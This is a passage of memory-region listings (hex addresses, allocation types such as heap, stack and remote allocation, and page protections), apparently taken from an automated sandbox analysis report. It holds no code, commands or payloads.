page read and write
9A71000
direct allocation
page execute and read and write
278A0000
trusted library allocation
page read and write
3026000
heap
page read and write
67ED000
heap
page read and write
488000
heap
page read and write
4C03000
trusted library allocation
page read and write
8C65000
heap
page read and write
271A0000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
1BF40913000
heap
page read and write
84CC000
stack
page read and write
8BC2000
heap
page read and write
1BF45EFA000
heap
page read and write
551E000
heap
page read and write
1BF40879000
heap
page read and write
54EB000
heap
page read and write
54EB000
heap
page read and write
30D0000
trusted library allocation
page read and write
6810000
heap
page read and write
8600000
trusted library allocation
page read and write
5524000
heap
page read and write
4AAC000
trusted library allocation
page read and write
80F2000
heap
page read and write
B10000
trusted library allocation
page read and write
BDDC67E000
unkown
page readonly
303D000
heap
page read and write
CC0000
trusted library allocation
page read and write
93FC000
heap
page read and write
688E000
heap
page read and write
24BFE000
trusted library allocation
page read and write
9490000
heap
page read and write
7030000
trusted library allocation
page read and write
2C30000
heap
page read and write
5AE000
stack
page read and write
27760000
trusted library allocation
page read and write
86E0000
direct allocation
page read and write
8A31000
heap
page read and write
8B55000
heap
page read and write
3029000
heap
page read and write
4FF2000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
8B3B000
heap
page read and write
67FF000
heap
page read and write
D50000
heap
page read and write
4A3E000
trusted library allocation
page read and write
6826000
heap
page read and write
271A0000
trusted library allocation
page read and write
6EC5D000
unkown
page read and write
459E000
stack
page read and write
9130000
heap
page read and write
93EE000
heap
page read and write
8F6000
trusted library allocation
page execute and read and write
54E3000
heap
page read and write
1BF45DE0000
remote allocation
page read and write
67F3000
heap
page read and write
27760000
trusted library allocation
page read and write
858E000
stack
page read and write
680A000
heap
page read and write
6EC40000
unkown
page readonly
4A52000
trusted library allocation
page read and write
67F0000
heap
page read and write
4FB0000
heap
page read and write
2FD7000
heap
page read and write
8FA000
trusted library allocation
page execute and read and write
1BF407A0000
trusted library section
page read and write
67FC000
heap
page read and write
480C000
trusted library allocation
page read and write
26C0F000
heap
page read and write
1BF40871000
heap
page read and write
6826000
heap
page read and write
6876000
heap
page read and write
6E57000
trusted library allocation
page read and write
27780000
trusted library allocation
page read and write
47A2000
trusted library allocation
page read and write
6DAF000
heap
page read and write
B842000
trusted library allocation
page read and write
CB0000
trusted library allocation
page execute and read and write
26C13000
heap
page read and write
3033000
heap
page read and write
302C000
heap
page read and write
26B1D000
trusted library allocation
page read and write
1BF45DE0000
remote allocation
page read and write
5718000
trusted library allocation
page read and write
8BC6000
heap
page read and write
There are 1271 hidden memdumps, click here to show them.